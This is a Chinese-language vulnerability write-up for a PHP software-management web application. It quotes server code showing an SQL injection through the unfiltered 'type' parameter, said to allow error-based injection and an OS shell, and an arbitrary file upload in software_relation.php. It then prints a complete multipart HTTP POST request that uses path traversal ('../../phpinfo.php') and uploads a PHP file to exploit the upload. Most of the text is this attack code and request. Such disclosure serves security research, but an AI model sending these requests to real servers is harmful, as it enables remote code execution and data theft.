SQL注入

文件inter/update_software_info.php

<?php
//客户端显示数据
require_once "./use_db.php";
require_once "./common/functions.php";

$return=array();
$return["nResult"] =0;

$where='where 1=1';

if (!is_null($_POST['type']) and $_POST['type'] !="") {
$id=$_POST['type'];
$where .=" and type=$id ";
}

if (!is_null($_POST['key'])) {
$keyname=$_POST['key'];
$where .=" and keyname like '%".$keyname."%' ";
}


$sql="select sc_software_items.id ,version,packagesize,keyname,packagename,photoname,descri,type,param ,ty.type_name as type_name from sc_software_items left join type_software ty on ty.type_id = sc_software_items.type {$where} group by id";
$type='select * from type_software';

try{

$return["software_list"]=array();
$return["typeList"]=array();
$result = $mysqlDB->query($sql);
$res = $mysqlDB->query($type);

type直接拼接,导致可报错注入,且可os-shell

image-20210514143012821

任意文件上传

文件路径/inter/software_relation.php

<?php
set_time_limit(0);
date_default_timezone_set("Asia/Shanghai");
require_once "./use_db.php";
session_start();
//储存信息到数据库sc_software_items
$id=$_POST["id"]; //软件名
$toolNames=$_POST["toolName"]; //软件名
$toolFileName=$_POST["toolFileName"]; //文件名称.exe
$toolDescri=$_POST["toolDescri"]; //描述
$version=$_POST["version"]; //版本号
$size=$_POST['fileSize']; //大小
$arr_softwarekey=$_POST['seilist']; //关联的软件
$type= $_POST['sofe_typeof']; //软件的类型
$param= isset($_POST['param']) ?$_POST['param'] : ""; //参数
$update_time=time();

function iconvCharset($fields){
//$out_string = mb_detect_encoding($fields, array("GBK","ASCII", "UTF-8", "GB2312", "BIG5"));
$out_string = "GBK";
$out_string .= "//IGNORE";
// return $fields;
if (PHP_OS == 'Linux') {
return iconv("UTF-8","GBK//IGNORE", $fields);
}else{
return iconv("UTF-8",$out_string,$fields);
}
}

$gb2312_filename = $toolFileName; //iconv("UTF-8", "GB2312",$toolFileName);
$file_path = "../softmanagement/files/{$toolFileName}";
$file_path_ = "../softmanagement/files/{$gb2312_filename}";
$_SESSION['name']=$toolFileName;
$_SESSION['time']=time();
$_SESSION['version']=$version;
$toolFileName=$version.'.'.$gb2312_filename;
@mkdir("../softmanagement/download");
$download_file = "../softmanagement/download/";
$file_name=$download_file.$toolFileName;
$photo_name=$download_file.iconv("UTF-8", "GB2312",$_FILES['toolImage']['name']);

$sql_type="select type_name from type_software where type_id='$type' ";
$type_res=$mysqlDB->query($sql_type);
foreach ($type_res as $value) {
$type_name=$value['type_name'];
}
try {
$file_name = iconvCharset($file_name);
$file_path = iconvCharset($file_path);
if ($id=='' or $id==null or $id==0 or !isset($_POST["id"])) {
// $id为空表示上传
if (copy($file_path,$file_name) || copy($file_path_, $file_name)) {
//默认图片
$photo_file='default.png';
if($_FILES['toolImage']['tmp_name'] != ''){
if (move_uploaded_file($_FILES['toolImage']['tmp_name'],$photo_name)) {
$photo_file=$_FILES['toolImage']['name'];
}else{
echo json_encode("move photo file failed");
exit();
}
}

没啥好说的,没过滤后缀直接传,需要注意的是toolFileName参数必须为一个已经存在的文件,根目录下有很多文件可供选择

POST /inter/software_relation.php HTTP/1.1
Host: 192.168.86.128:6868
User-Agent: insomnia/2021.3.0
Cookie: SKYLARa0aede9e785feabae789c6e03d=0dii85n3v7bh0ct4se9jckmee0
Content-Type: multipart/form-data; boundary=X-INSOMNIA-BOUNDARY
Accept: */*
Content-Length: 594
Connection: close

--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolFileName"

../../phpinfo.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolName"

123.php
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="version"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolDescri"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="fileSize"

1
--X-INSOMNIA-BOUNDARY
Content-Disposition: form-data; name="toolImage"; filename="info.php"
Content-Type: application/x-httpd-php

<?php
phpinfo();?>
--X-INSOMNIA-BOUNDARY--

image-20210514142807852